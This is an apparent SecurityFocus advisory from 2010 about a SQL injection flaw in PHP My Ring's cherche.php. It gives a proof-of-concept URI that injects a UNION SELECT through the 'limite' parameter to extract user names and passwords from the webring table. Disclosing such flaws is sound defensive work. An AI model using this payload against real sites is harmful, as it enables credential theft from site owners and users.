PHP My Ring Cherche.PHP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description


 

Privacy Statement
Copyright 2010, SecurityFocus